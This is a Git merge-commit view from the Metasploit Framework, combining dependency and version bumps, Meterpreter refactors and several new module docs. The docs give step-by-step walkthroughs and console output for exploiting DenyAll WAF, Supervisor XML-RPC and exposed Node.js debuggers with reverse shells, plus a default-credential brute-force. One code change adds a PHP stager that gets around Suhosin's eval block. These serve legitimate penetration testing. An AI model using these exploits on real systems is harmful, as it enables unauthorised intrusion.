Merge branch 'master' into fix_nmap_imports

bringing branch up to date
bug/bundler_fix
loftwing 2017-09-27 12:52:27 -05:00
commit f777e2ab3b
203 changed files with 1299 additions and 458 deletions

View File

@ -1 +1 @@
2.4.1
2.4.2

View File

@ -12,8 +12,8 @@ addons:
language: ruby
rvm:
- '2.2'
- '2.3.4'
- '2.4.1'
- '2.3.5'
- '2.4.2'
env:
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'

View File

@ -1,4 +1,4 @@
FROM ruby:2.4.1-alpine
FROM ruby:2.4.2-alpine
MAINTAINER Rapid7
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"

View File

@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.16.8)
metasploit-framework (4.16.9)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -17,7 +17,7 @@ PATH
metasploit-concern
metasploit-credential
metasploit-model
metasploit-payloads (= 1.3.7)
metasploit-payloads (= 1.3.8)
metasploit_data_models
metasploit_payloads-mettle (= 0.2.2)
msgpack
@ -150,7 +150,7 @@ GEM
activemodel (~> 4.2.6)
activesupport (~> 4.2.6)
railties (~> 4.2.6)
metasploit-payloads (1.3.7)
metasploit-payloads (1.3.8)
metasploit_data_models (2.0.15)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
@ -163,7 +163,7 @@ GEM
recog (~> 2.0)
metasploit_payloads-mettle (0.2.2)
method_source (0.8.2)
mini_portile2 (2.2.0)
mini_portile2 (2.3.0)
minitest (5.10.3)
msgpack (1.1.0)
multipart-post (2.0.0)
@ -171,8 +171,8 @@ GEM
net-ssh (4.2.0)
network_interface (0.0.2)
nexpose (7.0.1)
nokogiri (1.8.0)
mini_portile2 (~> 2.2.0)
nokogiri (1.8.1)
mini_portile2 (~> 2.3.0)
octokit (4.7.0)
sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1)
@ -193,10 +193,9 @@ GEM
activerecord (>= 4.0.0)
arel (>= 4.0.1)
pg_array_parser (~> 0.0.9)
pry (0.10.4)
pry (0.11.0)
coderay (~> 1.1.0)
method_source (~> 0.8.1)
slop (~> 3.4)
public_suffix (3.0.0)
rack (1.6.8)
rack-test (0.6.3)
@ -308,7 +307,6 @@ GEM
json (>= 1.8, < 3)
simplecov-html (~> 0.10.0)
simplecov-html (0.10.2)
slop (3.6.0)
sqlite3 (1.3.13)
sshkey (1.9.0)
thor (0.20.0)

View File

@ -0,0 +1,59 @@
## Description
This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
## Vulnerable Application
[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
[Inedo website](http://inedo.com/)
## Verification Steps
1. Do: ```use auxiliary/scanner/http/buildmaster_login```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: Set credentials
5. Do: ```run```
6. You should see the module attempting to log in.
## Scenarios
### Attempt to login with the default credentials.
```
msf > use auxiliary/scanner/http/buildmaster_login
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
RHOSTS => 10.0.0.39
msf auxiliary(buildmaster_login) > run
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(buildmaster_login) >
```
### Brute force with credentials from file.
```
msf > use auxiliary/scanner/http/buildmaster_login
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
RHOSTS => 10.0.0.39
msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
USERPASS_FILE => ~/BuildMasterCreds.txt
msf auxiliary(buildmaster_login) > run
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test"
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test"
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong"
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong"
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(buildmaster_login) >
```

View File

@ -0,0 +1,55 @@
# Description
This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects:
```PC NETWORK PROGRAM 1.0
LANMAN1.0
Windows for Workgroups 3.1a
LM1.2X002
LANMAN2.1
NT LM 0.12
```
If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected.
If the SMB server does not support SMBv1 a RST will be sent.
___
# Usage
The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not.
#### A host that does support SMBv1.
```
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
msf auxiliary(smb1) > set RHOSTS x.x.x.x
RHOSTS => x.x.x.x
msf auxiliary(smb1) > run
[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb1) > services -S x.x.x.x
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
x.x.x.x 445 tcp smb1 open
```
#### A host that does not support SMBv1
```
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
msf auxiliary(smb1) > set RHOSTS y.y.y.y
RHOSTS => y.y.y.y
msf auxiliary(smb1) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
___
## Options
The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```.

View File

@ -0,0 +1,47 @@
## Vulnerable Application
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
It's possible to have trial demo for 15 days at Amazon Marketplace.
[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
You just need to follow instruction above URL.
## Verification Steps
A successful check of the exploit will look like this:
- [ ] Start `msfconsole`
- [ ] `use use exploit/linux/http/denyall_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `iToken` value extraction.
- [ ] **Verify** that you are getting `meterpreter` session.
## Scenarios
```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit
[*] Started reverse TCP handler on 35.12.3.3:4444
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Trigerring command injection vulnerability with iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >
```

View File

@ -0,0 +1,78 @@
## Vulnerable Application
This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2
This has been tested with versions 3.2.0 and 3.3.2
### Creating A Testing Environment
At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
1. ```sudo apt-get install supervisor```
2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
```
[inet_http_server] ; inet (TCP) server disabled by default
port=:9001 ; ip_address:port specifier, *:port for all iface
username=user ; default is no username (open server)
password=123 ; default is no password (open server)
```
3. Restart the service: `sudo service supervisor restart`
## Verification Steps
1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
2. ```set lhost [IP]```
3. ```set rhost [IP]```
4. ```set httpusername user```
5. ```set httppassword 123```
6. ```exploit```
7. A meterpreter session should have been opened successfully
## Options
**HttpUsername**
Username for HTTP basic auth which is set in the conf file(optional)
**HttpPassword**
Password for HTTP basic auth which is set in the conf file(optional)
**TARGETURI**
The path to the XML-RPC endpoint
## Scenarios
### Supervisor 3.2.0 on Xubuntu 16.04
```
msf > use exploit/linux/http/supervisor_xmlrpc_exec
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
httpusername => user
msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
httppassword => 123
msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
rhost => 192.168.0.19
msf exploit(supervisor_xmlrpc_exec) > check
[*] Extracting version from web interface..
[*] Using basic auth (user:123)
[+] Vulnerable version found: 3.2.0
[*] 192.168.0.19:9001 The target appears to be vulnerable.
msf exploit(supervisor_xmlrpc_exec) > exploit
[*] Started reverse TCP handler on 192.168.0.2:4444
[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
[*] Using basic auth (user:123)
[*] Sending stage (2878872 bytes) to 192.168.0.19
[*] Command Stager progress - 100.00% done (782/782 bytes)
[+] Request timeout, usually indicates success. Passing to handler..
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100
meterpreter >
```

View File

@ -0,0 +1,64 @@
## Vulnerable Application
Current and historical versions of node (or any JS env based on the
V8 JS engine) have this functionality and could be exploitable if
configured to expose the JS port on an untrusted interface.
Install a version of node using any of the normal methods:
* Vendor: https://nodejs.org/en/download/package-manager/
* Distro: `sudo apt-get install nodejs`
Alternately, use standard node docker containers as targets:
```
$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858
```
(Others at https://hub.docker.com/_/node/)
Tested on Node 7.x, 6.x, 4.x
## Verification Steps
1. Run a node process exposing the debug port
```
node --debug=0.0.0.0:5858
```
2. Exploit it and catch the callback:
```
msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit
```
(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)
Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity
(such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.
## Scenarios
### Example Run (Node 7.x)
Victim:
```
$ node --version
v7.10.0
$ node --debug=0.0.0.0:5858
(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
Debugger listening on 0.0.0.0:5858
>
(To exit, press ^C again or type .exit)
```
Attacker:
```
msf exploit(nodejs_v8_debugger) > exploit
[*] Started reverse TCP handler on 10.0.0.141:4444
[*] 127.0.0.1:5858 - Sending 745 byte payload...
[*] 127.0.0.1:5858 - Got success response
[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700
id
(redacted)
```

View File

@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.16.8"
VERSION = "4.16.9"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash

View File

@ -3,30 +3,74 @@
require 'shellwords'
module Msf
module Sessions
module MeterpreterOptions
module Sessions
#
# Defines common options across all Meterpreter implementations
#
module MeterpreterOptions
TIMEOUT_SESSION = 24 * 3600 * 7 # 1 week
TIMEOUT_COMMS = 300 # 5 minutes
TIMEOUT_RETRY_TOTAL = 60 * 60 # 1 hour
TIMEOUT_RETRY_WAIT = 10 # 10 seconds
def initialize(info = {})
super(info)
register_advanced_options(
[
OptBool.new('AutoLoadStdapi', [true, "Automatically load the Stdapi extension", true]),
OptBool.new('AutoVerifySession', [true, "Automatically verify and drop invalid sessions", true]),
OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 30]),
OptString.new('InitialAutoRunScript', [false, "An initial script to run on session creation (before AutoRunScript)", '']),
OptString.new('AutoRunScript', [false, "A script to run automatically on session creation.", '']),
OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]),
OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]),
OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]),
OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]),
OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]),
OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', Rex::Post::Meterpreter::ClientCore::TIMEOUT_COMMS])
], self.class)
OptBool.new(
'AutoLoadStdapi',
[true, "Automatically load the Stdapi extension", true]
),
OptBool.new(
'AutoVerifySession',
[true, "Automatically verify and drop invalid sessions", true]
),
OptInt.new(
'AutoVerifySessionTimeout',
[false, "Timeout period to wait for session validation to occur, in seconds", 30]
),
OptString.new(
'InitialAutoRunScript',
[false, "An initial script to run on session creation (before AutoRunScript)", '']
),
OptString.new(
'AutoRunScript',
[false, "A script to run automatically on session creation.", '']
),
OptBool.new(
'AutoSystemInfo',
[true, "Automatically capture system information on initialization.", true]
),
OptBool.new(
'EnableUnicodeEncoding',
[true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]
),
OptPath.new(
'HandlerSSLCert',
[false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]
),
OptInt.new(
'SessionRetryTotal',
[false, "Number of seconds try reconnecting for on network failure", TIMEOUT_RETRY_TOTAL]
),
OptInt.new(
'SessionRetryWait',
[false, "Number of seconds to wait between reconnect attempts", TIMEOUT_RETRY_WAIT]
),
OptInt.new(
'SessionExpirationTimeout',
[ false, 'The number of seconds before this session should be forcibly shut down', TIMEOUT_SESSION]
),
OptInt.new(
'SessionCommunicationTimeout',
[ false, 'The number of seconds of no activity before this session should be killed', TIMEOUT_COMMS]
)
],
self.class
)
end
end
end
end
end
end

View File

@ -10,7 +10,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
# @param pass [String] Password
# @param redirect URL [String] to redirect after successful login
# @return [Hash] The post data for vars_post Parameter
def wordpress_helper_login_post_data(user, pass, redirect=nil)
def wordpress_helper_login_post_data(user, pass, redirect = nil)
post_data = {
'log' => user.to_s,
'pwd' => pass.to_s,
@ -39,15 +39,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
vars_post.merge!({
'author' => author,
'email' => email,
'url' => url,
'url' => url
}) unless login_cookie
options = {
'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
'method' => 'POST'
}
options.merge!({'vars_post' => vars_post})
options.merge!({'cookie' => login_cookie}) if login_cookie
options.merge!({ 'vars_post' => vars_post })
options.merge!({ 'cookie' => login_cookie }) if login_cookie
res = send_request_cgi(options)
if res && res.redirect? && res.redirection
return wordpress_helper_parse_location_header(res)
@ -65,7 +65,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
# @param comments_enabled [Boolean] If true try to find a post id with comments enabled, otherwise return the first found
# @param login_cookie [String] A valid login cookie to perform the bruteforce as an authenticated user
# @return [Integer,nil] The post id, nil when nothing found
def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil)
def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled = false, login_cookie = nil)
range.each { |id|
vprint_status("Checking POST ID #{id}...") if (id % 100) == 0
body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie)
@ -81,15 +81,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
# @param comments_enabled [Boolean] Check if comments are enabled on this post
# @param login_cookie [String] A valid login cookie to perform the check as an authenticated user
# @return [String,nil] the HTTP response body of the post, nil otherwise
def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil)
def wordpress_helper_check_post_id(uri, comments_enabled = false, login_cookie = nil)
options = {
'method' => 'GET',
'uri' => uri
}
options.merge!({'cookie' => login_cookie}) if login_cookie
options.merge!({ 'cookie' => login_cookie }) if login_cookie
res = send_request_cgi(options)
# post exists
if res and res.code == 200
if res && res.code == 200
# also check if comments are enabled
if comments_enabled
if res.body =~ /form.*action.*wp-comments-post\.php/
@ -123,8 +123,8 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
#
# @param cookie [String] A valid admin session cookie
# @return [String,nil] The nonce, nil on error
def wordpress_helper_get_plugin_upload_nonce(cookie)
uri = normalize_uri(wordpress_url_backend, 'plugin-install.php')
def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil)
uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php')
options = {
'method' => 'GET',
'uri' => uri,
@ -134,6 +134,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
res = send_request_cgi(options)
if res && res.code == 200
return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
elsif res && res.redirect? && res.redirection
path = wordpress_helper_parse_location_header(res)
return wordpress_helper_get_plugin_upload_nonce(cookie, path)
end
end
end

View File

@ -41,7 +41,10 @@ class Msf::Payload::Apk
application = amanifest.xpath('//application')
application_name = application.attribute("name")
if application_name
return application_name.to_s
application_str = application_name.to_s
unless application_str == 'android.app.Application'
return application_str
end
end
activities = amanifest.xpath("//activity|//activity-alias")
for activity in activities
@ -221,7 +224,7 @@ class Msf::Payload::Apk
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
package = amanifest.xpath("//manifest").first['package']
package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}"
classes = {}
classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize
classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize

View File

@ -31,7 +31,7 @@ module Payload::Linux::BindTcp
# Generate the more advanced stager if we have the space
if self.available_space && required_space <= self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end

View File

@ -109,7 +109,15 @@ while (strlen($b) < $len) {
# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
{
$suhosin_bypass=create_function('', $b);
$suhosin_bypass();
}
else
{
eval($b);
}
die();^
end

View File

@ -102,7 +102,15 @@ while (strlen($b) < $len) {
# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
{
$suhosin_bypass=create_function('', $b);
$suhosin_bypass();
}
else
{
eval($b);
}
die();^
end

View File

@ -35,7 +35,7 @@ module Payload::Windows::BindTcp
# Generate the more advanced stager if we have the space
if self.available_space && required_space <= self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end

View File

@ -33,7 +33,7 @@ module Payload::Windows::BindTcpRc4
# Generate the more advanced stager if we have the space
if self.available_space && required_space <= self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end

View File

@ -33,7 +33,7 @@ module Payload::Windows::BindTcp_x64
# Generate the more advanced stager if we have the space
if self.available_space && required_space <= self.available_space
conf[:exitfunk] = datastore['EXITFUNC'],
conf[:exitfunk] = datastore['EXITFUNC']
conf[:reliable] = true
end

View File

@ -40,7 +40,9 @@ module Msf::Post::Unix
#
def get_groups
groups = []
cmd_out = read_file("/etc/group").split("\n")
group = '/etc/group'
if file_exist?(group)
cmd_out = read_file(group).split("\n")
cmd_out.each do |l|
entry = {}
user_field = l.split(":")
@ -49,6 +51,7 @@ module Msf::Post::Unix
entry[:users] = user_field[3]
groups << entry
end
end
return groups
end
@ -59,9 +62,12 @@ module Msf::Post::Unix
user_dirs = []
# get all user directories from /etc/passwd
read_file("/etc/passwd").each_line do |passwd_line|
passwd = '/etc/passwd'
if file_exist?(passwd)
read_file(passwd).each_line do |passwd_line|
user_dirs << passwd_line.split(/:/)[5]
end
end
# also list other common places for home directories in the event that
# the users aren't in /etc/passwd (LDAP, for example)

View File

@ -66,23 +66,26 @@ module Msf
end
def cmd_edit_help
msg = "Edit the currently active module"
msg = "#{msg} #{local_editor ? "with #{local_editor}" : "(LocalEditor or $VISUAL/$EDITOR should be set first)"}."
print_line "Usage: edit"
print_line "Usage: edit [file/to/edit.rb]"
print_line
print_line msg
print_line "When done editing, you must reload the module with 'reload' or 'rerun'."
print_line "Edit a local file or the currently active module with #{local_editor}"
print_line "If a file path is specified it will automatically be reloaded after editing"
print_line "Otherwise, you can reload the active module with 'reload' or 'rerun'."
print_line
end
#
# Edit the currently active module
#
def cmd_edit
if active_module
editor = local_editor
def cmd_edit(*args)
if args.length > 0
path = args[0]
elsif active_module
path = active_module.file_path
end
if path
editor = local_editor
if editor.nil?
editor = 'vim'
print_warning("LocalEditor or $VISUAL/$EDITOR should be set. Falling back on #{editor}.")
@ -90,6 +93,10 @@ module Msf
print_status("Launching #{editor} #{path}")
system(editor, path)
if args.length > 0
load args[0]
end
else
print_error('Nothing to edit -- try using a module first.')
end

View File

@ -34,24 +34,12 @@ module Meterpreter
###
class ClientCore < Extension
UNIX_PATH_MAX = 108
DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock"
METERPRETER_TRANSPORT_SSL = 0
METERPRETER_TRANSPORT_HTTP = 1
METERPRETER_TRANSPORT_HTTPS = 2
TIMEOUT_SESSION = 24*3600*7 # 1 week
TIMEOUT_COMMS = 300 # 5 minutes
TIMEOUT_RETRY_TOTAL = 60*60 # 1 hour
TIMEOUT_RETRY_WAIT = 10 # 10 seconds
VALID_TRANSPORTS = {
'reverse_tcp' => METERPRETER_TRANSPORT_SSL,
'reverse_http' => METERPRETER_TRANSPORT_HTTP,
'reverse_https' => METERPRETER_TRANSPORT_HTTPS,
'bind_tcp' => METERPRETER_TRANSPORT_SSL
}
VALID_TRANSPORTS = [
'reverse_tcp',
'reverse_http',
'reverse_https',
'bind_tcp'
]
include Rex::Payloads::Meterpreter::UriChecksum
@ -577,46 +565,12 @@ class ClientCore < Extension
raise RuntimeError, 'Cannot migrate into current process', caller
end
if client.platform == 'linux'
if writable_dir.to_s.strip.empty?
writable_dir = tmp_folder
end
stat_dir = client.fs.filestat.new(writable_dir)
unless stat_dir.directory?
raise RuntimeError, "Directory #{writable_dir} not found", caller
end
# Rex::Post::FileStat#writable? isn't available
end
migrate_stub = generate_migrate_stub(target_process)
migrate_payload = generate_migrate_payload(target_process)
# Build the migration request
request = Packet.create_request('core_migrate')
if client.platform == 'linux'
socket_path = File.join(writable_dir, Rex::Text.rand_text_alpha_lower(5 + rand(5)))
if socket_path.length > UNIX_PATH_MAX - 1
raise RuntimeError, 'The writable dir is too long', caller
end
pos = migrate_payload.index(DEFAULT_SOCK_PATH)
if pos.nil?
raise RuntimeError, 'The meterpreter binary is wrong', caller
end
migrate_payload[pos, socket_path.length + 1] = socket_path + "\x00"
ep = elf_ep(migrate_payload)
request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000)
request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep)
request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib])
end
request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid)
request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length)
request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib])
@ -722,11 +676,8 @@ class ClientCore < Extension
# Indicates if the given transport is a valid transport option.
#
def valid_transport?(transport)
if transport
VALID_TRANSPORTS.has_key?(transport.downcase)
else
false
end
return false if transport.nil?
VALID_TRANSPORTS.include?(transport.downcase)
end
#
@ -830,11 +781,11 @@ private
opts[:lhost] = nil
end
transport = VALID_TRANSPORTS[opts[:transport]]
transport = opts[:transport].downcase
request = Packet.create_request(method)
scheme = opts[:transport].split('_')[1]
scheme = transport.split('_')[1]
url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}"
if opts[:luri] && opts[:luri].length > 0
@ -864,7 +815,7 @@ private
end
# do more magic work for http(s) payloads
unless opts[:transport].ends_with?('tcp')
unless transport.ends_with?('tcp')
if opts[:uri]
url << '/' unless opts[:uri].start_with?('/')
url << opts[:uri]
@ -878,7 +829,7 @@ private
opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua])
if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert]
if transport == 'reverse_https' && opts[:cert]
hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert])
request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash)
end
@ -902,24 +853,7 @@ private
request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)
request.add_tlv(TLV_TYPE_TRANS_URL, url)
return request
end
#
# Create a full migration payload specific to the target process.
#
def generate_migrate_payload(target_process)
case client.platform
when 'windows'
blob = generate_migrate_windows_payload(target_process)
when 'linux'
blob = generate_migrate_linux_payload
else
raise RuntimeError, "Unsupported platform '#{client.platform}'"
end
blob
request
end
#
@ -945,34 +879,18 @@ private
end
#
# Create a full Linux-specific migration payload specific to the target process.
# Create a full migration payload specific to the target process.
#
def generate_migrate_linux_payload
MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
def generate_migrate_payload(target_process)
case client.platform
when 'windows'
blob = generate_migrate_windows_payload(target_process)
else
raise RuntimeError, "Unsupported platform '#{client.platform}'"
end
#
# Determine the elf entry poitn for the given payload.
#
def elf_ep(payload)
elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
ep = elf.elf_header.e_entry
return ep
blob
end
#
# Get the tmp folder for the session.
#
def tmp_folder
tmp = client.sys.config.getenv('TMPDIR')
if tmp.to_s.strip.empty?
tmp = '/tmp'
end
tmp
end
end
end; end; end

View File

@ -170,10 +170,7 @@ class Config
ret = []
res = client.send_request(req)
res.each(TLV_TYPE_PRIVILEGE) do |p|
ret << {
priv: p.get_tlv_value(TLV_TYPE_PRIVILEGE_NAME),
enabled: p.get_tlv_value(TLV_TYPE_PRIVILEGE_ENABLED),
}
ret << p.value
end
ret
end

View File

@ -16,9 +16,7 @@ TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631
TLV_TYPE_PRIVILEGE = TLV_META_TYPE_GROUP | 632
TLV_TYPE_PRIVILEGE_NAME = TLV_META_TYPE_STRING | 633
TLV_TYPE_PRIVILEGE_ENABLED = TLV_META_TYPE_BOOL | 634
TLV_TYPE_PRIVILEGE = TLV_META_TYPE_STRING | 632
##
#

View File

@ -757,7 +757,7 @@ class Console::CommandDispatcher::Core
# Arguments for transport switching
#
@@transport_opts = Rex::Parser::Arguments.new(
'-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}"],
'-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.join(', ')}"],
'-l' => [true, 'LHOST parameter (for reverse transports)'],
'-p' => [true, 'LPORT parameter'],
'-i' => [true, 'Specify transport by index (currently supported: remove)'],

View File

@ -899,12 +899,12 @@ class Console::CommandDispatcher::Stdapi::Sys
'Header' => 'Enabled Process Privileges',
'Indent' => 0,
'SortIndex' => 1,
'Columns' => ['Priv Name', 'Enabled']
'Columns' => ['Name']
)
privs = client.sys.config.getprivs
client.sys.config.getprivs.each do |priv|
table << [priv[:priv], priv[:enabled].to_s]
table << [priv]
end
print_line

View File

@ -191,9 +191,9 @@ class Client
# Closes the connection to the remote server.
#
def close
if (self.conn)
if self.conn && !self.conn.closed?
self.conn.shutdown
self.conn.close unless self.conn.closed?
self.conn.close
end
self.conn = nil

View File

@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.3.7'
spec.add_runtime_dependency 'metasploit-payloads', '1.3.8'
# Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2'
# Needed by msfgui and other rpc components

View File

